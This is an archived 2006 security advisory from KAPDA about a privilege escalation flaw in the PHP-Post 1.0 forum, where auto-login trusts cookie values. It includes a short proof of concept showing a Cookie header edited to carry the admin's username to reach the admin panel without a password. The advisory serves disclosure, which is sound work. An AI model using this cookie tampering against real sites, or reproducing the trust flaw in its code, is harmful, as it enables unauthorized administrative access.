Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: b06-3694.htm

PHP-Post 1.0 Cookie Modification Privilege Escalation Vulnerability



- PHP-Post 1.0 Cookie Modification Privilege Escalation Vulnerability
- PHP-Post 1.0 Cookie Modification Privilege Escalation Vulnerability



[KAPDA::#52] - PHP-Post 1.0 Cookie Modification Privilege Escalation Vulnerability=0D
=0D
KAPDA New advisory=0D
=0D
Vulnerable product: Tested on PHP-Post 0.21 and 1.0=0D
Vendor: http://php-post.co.uk=0D 
Vulnerability: Privilege Escalation=0D
=0D
Date:=0D
--------------------=0D
Found: Nov 23, 2005=0D
Vendor Contacted: Jun 01, 2006=0D
Release Date: July 18, 2006=0D
=0D
About PHP-Post:=0D
--------------------=0D
Free, full featured php+mysql Forum Management System.=0D
=0D
Vulnerability:=0D
--------------------=0D
Privilege Escalation:=0D
PHP-Post contains a flaw that may allow a remote attacker to gain administrative privileges.=0D
PHP-Post doesn't properly authenticate remote users if auto login is on!=0D
By editing the values of the cookie, an attacker can change their privilege from a regular user to administrator and submit it back to the site.=0D
=0D
Proof of Concepts:=0D
--------------------=0D
Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]=3nitr0; logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284; post[329]=330=0D
=0D
change to:=0D
=0D
Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]="ADMIN`S USERNAME"; logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284; post[329]=330=0D
=0D
refresh the site, go to the admin`s panel without password ;)=0D
=0D
Solution:=0D
--------------------=0D
No special patch is yet released by vendor but the vendor's website was patched!=0D
=0D
Jun 01, 2006: vendor contacted=0D
Jun 03, 2006: vendor replied=0D
* July 18, 2006: public release=0D
=0D
Original Advisory:=0D
--------------------=0D
http://www.kapda.ir/advisory-380.html=0D 
=0D
Credit:=0D
--------------------=0D
FarhadKey of KAPDA=0D
farhadkey [at} kapda  net=0D
Kapda - Security Science Researchers Insitute of Iran=0D
http://www.KAPDA.ir 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH